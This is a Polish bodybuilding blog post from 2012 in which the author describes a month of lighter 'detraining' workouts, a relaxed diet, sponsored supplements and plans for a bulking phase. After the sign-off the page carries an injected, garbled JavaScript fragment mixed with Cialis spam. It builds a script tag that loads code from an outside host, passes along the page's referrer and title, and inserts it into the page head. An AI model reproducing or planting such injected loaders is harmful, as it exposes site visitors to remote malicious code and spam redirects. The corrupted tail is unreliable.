OKRES ROZTRENOWANIA

21.05.2012 / Adam Jabłoński / Kulturystyka

Cześć,

Mija właśnie miesiąc od kiedy zacząłem okres „roztrenowania”, czyli siłownia 3 – max 4 razy w tygodniu + 2-3 x 30 min aerobów po treningu siłowym.

Treningi siłowe nie są wyczerpujące – 3 ćwiczenia po 3 serie.
Na treningu siłowym staram się zrobić 2 grupy mięśniowe ale jeśli czuję się zmęczony np. po treningu pleców to zaprzestaje na tym trening.

Co do diety to jest trzymana w 60% reszta pochodzi z normalnego pożywienia, dlatego od czasu do czasu pozwalam sobie na lody, ciastka, cukierku niestety ten czas się kończy i wracam do trzymania diety.

Jeśli chodzi suplementacje to dzięki firmie TREC, która pomaga mi w trzymaniu formy mogę pozwolić sobie na okrągłe stosowanie BCAA, Glutaminy, Izolatu Białka, witamin itp.

W okresie roztrenowania dodałem słynne HMB i GABA 750 ( rewelacyjnie sie po tym suplemencie zasypia.)
Kolejnym suplementem jest TRIBULON BLACK – bardzo dobry tribulus, dodaje fajnego Vigoru i człowiek jest żywszy.

Co do planów to jeszcze zostało mi parę dni roztrenowania, a następnie z 3-4 dniowa przerwa po czym wracam pełną parą i zaczynam okres budowania masy mięśniowej który potrwa, aż do końca tego roku.
Jest to pierwszy raz kiedy będę robił w wiosnę/lato masę.
Jestem ciekaw rezultatów ponieważ moja obecna waga z rana wynosi 97-98 kg.

Pozdrawiam
Hej
Cześćs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; best price for cialis 5 mg document.currentScript.parentNode.insertBefore(s, document.currentScript);d.getElementsByTagName('head')[0].appendChild(s);